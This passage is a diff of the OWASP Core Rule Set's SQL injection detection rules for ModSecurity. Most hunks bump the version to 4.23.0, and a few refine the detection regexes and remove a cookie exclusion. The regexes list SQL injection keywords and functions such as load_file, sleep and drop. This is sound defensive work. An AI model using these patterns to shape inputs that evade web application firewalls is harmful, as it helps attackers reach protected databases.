"@rx (?i)\b tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -123,7 +123,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -167,7 +167,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -193,7 +193,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -219,7 +219,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -243,7 +243,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^(?i:- tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -269,7 +269,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -295,7 +295,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)al tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -316,7 +316,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:me tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -337,7 +337,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)un tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -363,7 +363,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -389,7 +389,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\[ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -418,7 +418,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)cr tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -428,12 +428,12 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)cr # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 942350 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)create[\s\x0b]+function[\s\x0b].+[\s\x0b]returns|;[\s\x0b]*?(?:alter|(?:(?:cre|trunc|upd)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)\b[\s\x0b]*?[\(\[]?[0-9A-Z_a-z]{2,}" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)create[\s\x0b]+function[\s\x0b].+[\s\x0b]returns|;[\s\x0b]*?(?:alter|(?:(?:cre|trunc|upd)at|re(?:nam|plac))e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)\b[\s\x0b]*?[\(\[]?[0-9A-Z_a-z]{2,}" \ "id:942350,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,\ + t:none,t:urlDecodeUni,t:replaceComments,\ msg:'Detects MySQL UDF injection and other data/structure manipulation attempts',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -444,7 +444,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)cr tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -483,7 +483,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -524,7 +524,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)/\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ @@ -561,7 +561,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^(?:[^ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'paranoia-level/1',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -591,7 +591,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)1\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -621,14 +621,14 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -661,7 +661,7 @@ SecRule ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[!=]=|&&|\|\||->|>[=>]| tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -702,7 +702,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\x0b\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.942130_matched_var_name=%{matched_var_name}',\ chain" @@ -738,7 +738,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\x0b\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.942131_matched_var_name=%{matched_var_name}',\ @@ -775,7 +775,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -818,7 +818,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -847,7 +847,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -876,7 +876,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -902,7 +902,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -928,7 +928,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\) tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -954,7 +954,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -988,7 +988,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1017,7 +1017,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)in tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1042,7 +1042,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:^[ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1072,7 +1072,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1104,7 +1104,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:Referer|REQUEST_HE tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1114,7 +1114,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:Referer|REQUEST_HE # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 942380 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:having\b(?:[\s\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')[\s\x0b]*?[<->]| ?(?:[0-9]{1,10} ?[<->]+|[\"'][^=]{1,10}[ \"'<-\?\[]+))|ex(?:ecute(?:\(|[\s\x0b]{1,5}[\$\.0-9A-Z_a-z]{1,5}[\s\x0b]{0,3})|ists[\s\x0b]*?\([\s\x0b]*?select\b)|(?:create[\s\x0b]+?table.{0,20}?|like[^0-9A-Z_a-z]*?char[^0-9A-Z_a-z]*?)\()|select.*?case|from.*?limit|order[\s\x0b]by|exists[\s\x0b](?:[\s\x0b]select|s(?:elect[^\s\x0b](?:if(?:null)?[\s\x0b]\(|top|concat)|ystem[\s\x0b]\()|\bhaving\b[\s\x0b]+[0-9]{1,10}|'[^=]{1,10}')" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:having\b(?:[\s\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')[\s\x0b]*?[<->]| ?(?:[0-9]{1,10} ?[<->]+|[\"'][^=]{1,10}[ \"'<-\?\[]+))|ex(?:ecute(?:\(|[\s\x0b]{1,5}[\$\.0-9A-Z_a-z]{1,5}[\s\x0b]{0,3})|ists[\s\x0b]*?\([\s\x0b]*?select\b)|(?:create[\s\x0b]+?table.{0,20}?|like[^0-9A-Z_a-z]*?char[^0-9A-Z_a-z]*?)\()|select.*?case|from.*?limit|order[\s\x0b]by|exists[\s\x0b](?:[\s\x0b]select|s(?:elect[^\s\x0b](?:if(?:null)?[\s\x0b]\(|top|concat)|ystem[\s\x0b]\()|\bhaving\b[\s\x0b]+[0-9]{1,10}|'[^=]{1,10}')" \ "id:942380,\ phase:2,\ block,\ @@ -1130,7 +1130,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1140,7 +1140,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 942390 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:or\b(?:[\s\x0b]?(?:[0-9]{1,10}|[\"'][^=]{1,10}[\"'])[\s\x0b]?[<->]+|[\s\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\s\x0b]*?[<->])?)|xor\b[\s\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\s\x0b]*?[<->])?)|'[\s\x0b]+x?or[\s\x0b]+.{1,20}[!\+\-<->]" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:or\b(?:[\s\x0b]?(?:[0-9]{1,10}|[\"'][^=]{1,10}[\"'])[\s\x0b]?[<->]+|[\s\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\s\x0b]*?[<->])?)|xor\b[\s\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\s\x0b]*?[<->])?)|'[\s\x0b]+x?or[\s\x0b]+.{1,20}[!\+\-<->]" \ "id:942390,\ phase:2,\ block,\ @@ -1156,7 +1156,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1166,7 +1166,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 942400 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\band\b(?:[\s\x0b]+(?:[0-9]{1,10}[\s\x0b]*?[<->]|'[^=]{1,10}')| ?(?:[0-9]{1,10}|[\"'][^=]{1,10}[\"']) ?[<->]+)" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\band\b(?:[\s\x0b]+(?:[0-9]{1,10}[\s\x0b]*?[<->]|'[^=]{1,10}')| ?(?:[0-9]{1,10}|[\"'][^=]{1,10}[\"']) ?[<->]+)" \ "id:942400,\ phase:2,\ block,\ @@ -1182,7 +1182,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1197,7 +1197,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 942410 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:(?:b|co)s|dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:in|cii(?:str)?)|tan2?|vg)|b(?:enchmark|i(?:n(?:_to_num)?|t_(?:and|count|length|x?or)))|c(?:ast|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|o(?:alesce|ercibility|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|(?:un)?t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|time(?:stamp)?|user)))|d(?:a(?:t(?:abase|e(?:_(?:add|format|sub)|diff)?)|y(?:name|of(?:month|week|year))?)|count|e(?:code|(?:faul|s_(?:de|en)cryp)t|grees)|ump)|e(?:lt|nc(?:ode|rypt)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:eld(?:_in_set)?|nd_in_set)|loor|o(?:rmat|und_rows)|rom_(?:base64|days|unixtime))|g(?:et_(?:format|lock)|r(?:eates|oup_conca)t)|h(?:ex(?:toraw)?|our)|i(?:f(?:null)?|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)?|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull))|null)?)|l(?:ast(?:_(?:day|insert_id))?|case|e(?:(?:as|f)t|ngth)|n|o(?:ad_file|ca(?:l(?:timestamp)?|te)|g(?:10|2)?|wer)|pad|trim)|m(?:a(?:ke(?:date|_set)|ster_pos_wait|x)|d5|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:d|nth(?:name)?))|n(?:ame_const|o(?:t_in|w)|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:assword|eriod_(?:add|diff)|g_sleep|i|o(?:sition|w(?:er)?)|rocedure_analyse)|qu(?:arter|ote)|r(?:a(?:dians|nd|wto(?:hex|nhex(?:toraw)?))|e(?:lease_lock|p(?:eat|lace)|verse)|ight|o(?:und|w_count)|pad|trim)|s(?:chema|e(?:c(?:ond|_to_time)|ssion_user)|ha[12]?|ig?n|leep|oundex|pace|qrt|t(?:d(?:dev(?:_(?:po|sam)p)?)?|r(?:cmp|_to_date))|u(?:b(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|m)|ys(?:date|tem_user))|t(?:an|ime(?:diff|_(?:format|to_sec)|stamp(?:add|diff)?)?|o_(?:base64|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|ix_timestamp)|p(?:datexml|per)|ser|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|v(?:a(?:lues|r(?:iance|_(?:po|sam)p))|ersion)|we(?:ek(?:day|ofyear)?|ight_string)|xmltype|year(?:week)?)[^0-9A-Z_a-z]*?\(